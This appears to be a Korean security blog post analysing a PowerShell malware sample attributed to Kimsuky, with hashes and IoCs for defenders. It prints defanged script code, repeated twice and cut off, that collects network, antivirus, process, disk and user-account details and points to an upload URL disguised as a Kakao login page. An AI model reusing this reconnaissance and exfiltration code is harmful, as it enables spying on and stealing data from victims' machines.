김수키(Kimsuky) 에서 만든 파워셀 악성코드-1.ps1(<-가칭 2025.3.13)
Contents
오늘은 북한의 APT 조직인 북한 정찰총국 산하의 해킹 조직 중인 하나인 김수키(Kimsuky) 에서 만든 파워셀 악성코드인 1.ps1(<-가칭 2025.3.13)에 대해 알아보겠습니다.
파일명:1.ps1
사이즈:1 MB
MD5:85f5075610661c9706571a33548d7585
SHA-1:bc36b9e8cf23dc0287f090a5c0bad3b391d00f86
SHA-256:6ffb5106d912e582bde2c095365fa37a441741e4b9ea7f856b2ecad9516b74c2
해당 코드는 단순하게 PowerShell(파워셀) 된 악성코드 이면 해당 코드 에 국민 메신저이고 어느 곳에서는 검열 문제로 시끄러운 카카오톡 관련 url 이 있는 악성코드입니다.
악성코드 내용
$iPath = "$env:TEMP\processlist(.)txt";
$cPath = "$env:TEMP\disk(.)txt";
$uPath = "$env:TEMP\user(.)txt";
$sPath = "$env:TEMP\c_s(.)txt";
$ipPath = "$env:TEMP\ip(.)txt";
$oPath = "$env:TEMP\processlist(.)zip";
$oName = "abc_pl.zip";
$up_path = "htt"(+)"p://10"(+)"1.3"(+)"6.11"(+)"4(.)190/accou"(+)"nts(.)k"+"akao(.)comwe"(+)"blogin"(+)"find_acco"(+)"unt/sh"(+)"owHeader/"(+)"na"(+)"te(.)php";
$svbs = "$env:TEMP\dose(.)vbs";
if ([System.IO.File]::Exis(t)s($svbs)) {
remove-item $svbs -Force (-)Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($sv(b)s)) {
remove-item $svbs -Force -Recur(s)e -ErrorAct(i)on Silen(t)lyContinue;
}
if ([System.IO(.)File]::Exists($oPath)) {
remove-item $oPath -Force -Recurse -ErrorA(c)tion Sil(e)ntlyContinue;
}
if ([System.IO.File]::Exists($i(P)ath)) {
remove-item $iPath -Force -Rec(u)rse -ErrorAction Silen(t)lyContinue;
}
Get-NetIP(A)ddress | Out-File -FileP(a)th $iPa(t)h -Append;
(Get-WmiObject -Names(p)ace root\SecurityCenter(2) -Class AntiVir(u)sProduct).disp(l)ayName | Out-File -Fi(l)ePath $iPath -Append;
Get-Process | Out-File -Fi(l)ePath $iPath -Append;
Get-WmiObject -Class Win32_Lo(g)icalDisk -Filter "(D)riveType=3" | Select-Object Devi(c)eID, VolumeName, @{Name="Size(GB)"; Expression={[math]::round($_(.)Size / 1GB, 2)}}, @{Name="Fr(e)eSpace(GB)"; Expr(e)ssion={[math]::round(()$_.FreeSpace / 1G(B), 2)}} | Out-File -FilePath $iPath -Append;
Get-LocalUser | Format-Li(s)t * | Out-File -FilePath $iPath -Append;
Get-WmiObject -Class Win3(2)_OperatingSystem | Select-Object ProductType | Out-File -FilePath $iPath -Append;
Compress-Archive …
파일명:1.ps1
사이즈:1 MB
MD5:85f5075610661c9706571a33548d7585
SHA-1:bc36b9e8cf23dc0287f090a5c0bad3b391d00f86
SHA-256:6ffb5106d912e582bde2c095365fa37a441741e4b9ea7f856b2ecad9516b74c2
해당 코드는 단순하게 PowerShell(파워셀) 된 악성코드 이면 해당 코드 에 국민 메신저이고 어느 곳에서는 검열 문제로 시끄러운 카카오톡 관련 url 이 있는 악성코드입니다.
악성코드 내용
$iPath = "$env:TEMP\processlist(.)txt";
$cPath = "$env:TEMP\disk(.)txt";
$uPath = "$env:TEMP\user(.)txt";
$sPath = "$env:TEMP\c_s(.)txt";
$ipPath = "$env:TEMP\ip(.)txt";
$oPath = "$env:TEMP\processlist(.)zip";
$oName = "abc_pl.zip";
$up_path = "htt"(+)"p://10"(+)"1.3"(+)"6.11"(+)"4(.)190/accou"(+)"nts(.)k"+"akao(.)comwe"(+)"blogin"(+)"find_acco"(+)"unt/sh"(+)"owHeader/"(+)"na"(+)"te(.)php";
$svbs = "$env:TEMP\dose(.)vbs";
if ([System.IO.File]::Exis(t)s($svbs)) {
remove-item $svbs -Force (-)Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($sv(b)s)) {
remove-item $svbs -Force -Recur(s)e -ErrorAct(i)on Silen(t)lyContinue;
}
if ([System.IO(.)File]::Exists($oPath)) {
remove-item $oPath -Force -Recurse -ErrorA(c)tion Sil(e)ntlyContinue;
}
if ([System.IO.File]::Exists($i(P)ath)) {
remove-item $iPath -Force -Rec(u)rse -ErrorAction Silen(t)lyContinue;
}
Get-NetIP(A)ddress | Out-File -FileP(a)th $iPa(t)h -Append;
(Get-WmiObject -Names(p)ace root\SecurityCenter(2) -Class AntiVir(u)sProduct).disp(l)ayName | Out-File -Fi(l)ePath $iPath -Append;
Get-Process | Out-File -Fi(l)ePath $iPath -Append;
Get-WmiObject -Class Win32_Lo(g)icalDisk -Filter "(D)riveType=3" | Select-Object Devi(c)eID, VolumeName, @{Name="Size(GB)"; Expression={[math]::round($_(.)Size / 1GB, 2)}}, @{Name="Fr(e)eSpace(GB)"; Expr(e)ssion={[math]::round(()$_.FreeSpace / 1G(B), 2)}} | Out-File -FilePath $iPath -Append;
Get-LocalUser | Format-Li(s)t * | Out-File -FilePath $iPath -Append;
Get-WmiObject -Class Win3(2)_OperatingSystem | Select-Object ProductType | Out-File -FilePath $iPath -Append;
Compress-Archive …
IoC
bc36b9e8cf23dc0287f090a5c0bad3b391d00f86
6ffb5106d912e582bde2c095365fa37a441741e4b9ea7f856b2ecad9516b74c2
85f5075610661c9706571a33548d7585
6ffb5106d912e582bde2c095365fa37a441741e4b9ea7f856b2ecad9516b74c2
85f5075610661c9706571a33548d7585